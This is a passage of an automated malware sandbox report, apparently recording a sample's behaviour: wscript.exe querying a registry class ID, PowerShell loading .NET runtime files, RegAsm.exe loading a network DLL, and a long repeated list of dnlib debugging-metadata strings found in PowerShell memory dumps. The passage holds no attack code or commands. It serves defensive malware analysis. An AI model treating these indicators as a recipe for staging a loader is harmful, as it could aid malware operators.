                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
